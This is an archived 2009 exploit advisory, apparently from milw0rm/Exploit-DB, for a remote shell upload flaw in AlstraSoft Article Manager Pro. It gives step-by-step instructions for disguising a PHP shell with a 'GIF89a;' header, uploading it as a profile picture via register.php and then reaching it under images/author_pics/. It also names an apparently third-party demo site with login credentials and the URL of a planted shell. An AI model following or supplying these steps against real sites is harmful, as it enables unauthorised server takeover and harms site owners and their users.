Alstrasoft Article Manager Pro - Arbitrary File Upload

EDB-ID:

8855

CVE:

N/A


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2009-06-02


[~] AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Author: ZoRLu
[~]
[~] Date: 02.06.2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~] 
[~] N0T: KPSS ananI ...
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

add this code you shell head:

exapmle:

GIF89a;
<?

...
...
...

?>

save you shell.php

after go here:

yildirimordulari.com/article/register.php

after select your shell.php

done register after login to site edit your profile

and you look your shell name

yildirimordulari.com/article/images/author_pics/[id].php

example demo:

http://www.blizsoft.com/article/register.php

user: salla

pass: 123a123

shell:

http://www.blizsoft.com/article/images/author_pics/41.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-02]